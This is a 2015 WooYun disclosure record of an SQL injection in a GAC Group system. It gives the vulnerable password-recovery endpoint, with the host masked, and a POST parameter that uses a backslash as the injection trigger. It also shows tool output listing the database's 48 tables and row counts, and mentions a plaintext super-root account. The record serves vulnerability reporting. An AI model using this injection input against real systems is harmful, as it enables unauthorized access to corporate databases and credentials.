当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151197

漏洞标题:广汽集团某系统SQL注入漏洞

相关厂商:广汽集团

漏洞作者: ledoo

提交时间:2015-11-02 21:51

修复时间:2015-12-21 16:18

公开时间:2015-12-21 16:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经确认,细节仅向厂商公开
2015-11-16: 细节向核心白帽子及相关领域专家公开
2015-11-26: 细节向普通白帽子公开
2015-12-06: 细节向实习白帽子公开
2015-12-21: 细节向公众公开

简要描述:

广汽集团某系统SQL注入漏洞

详细说明:

http://**.**.**.**/platform/public/doFindPassword.jsp
(POST)fullname=\&username=swqvujxt


112.png

漏洞证明:

看了下表:

web application technology: JSP, Apache 2.2.26
back-end DBMS: MySQL >= 5.0.0
Database: fx
[48 tables]
+------------------------+
| ad |
| cms_archive |
| cms_archive_hist |
| cms_archive_keyword |
| cms_archive_right |
| cms_pic_permission |
| cms_read_history |
| prj_autoshowreport |
| prj_carseries |
| prj_material |
| prj_materialdownrecord |
| prj_materialtask |
| prj_materialtaskrecord |
| prj_mc_wish |
| sys_category |
| sys_category_hist |
| sys_class |
| sys_class_role |
| sys_class_role_hist |
| sys_class_user |
| sys_class_user_hist |
| sys_depart |
| sys_depart_backup |
| sys_depart_list |
| sys_detail |
| sys_dict |
| sys_dicttype |
| sys_filesetting |
| sys_fqle |
| sys_guestbook |
| sys_infodepart |
| sys_infogroup |
| sys_infouser |
| sys_infouserread |
| sys_operationlog |
| sys_role |
| sys_role_item |
| sys_sequence_backup |
| sys_seqyence |
| sys_subcategory |
| sys_sysopdetail |
| sys_sysopip |
| sys_sysoplogin |
| sys_version |
| sys_zone |
| sysop |
| sysop_role |
| sysop_role_hist |
+------------------------+
Database: fx
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| sys_sysoplogin | 237864 |
| prj_materialdownrecord | 75680 |
| prj_material | 964 |
| sysop | 340 |
| sys_depart | 291 |
| sys_depart_backup | 277 |
| sys_sysopdetail | 149 |
| sys_operationlog | 97 |
| sys_category | 57 |
| prj_materialtaskrecord | 47 |
| prj_autoshowreport | 33 |
| sysop_role | 14 |
| prj_carseries | 13 |
| sys_sequence_backup | 9 |
| prj_materialtask | 8 |
| cms_archive | 6 |
| sys_role | 4 |
+------------------------+---------+


然后看到了超级root账号:

111.png

修复方案:

检查过滤,明文密码

版权声明:转载请注明来源 ledoo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-06 16:17

厂商回复:

CNVD未复现所述情况,且不能确认风险点是否存活,暂未列入处置流程。

最新状态:

暂无


漏洞评价:

评价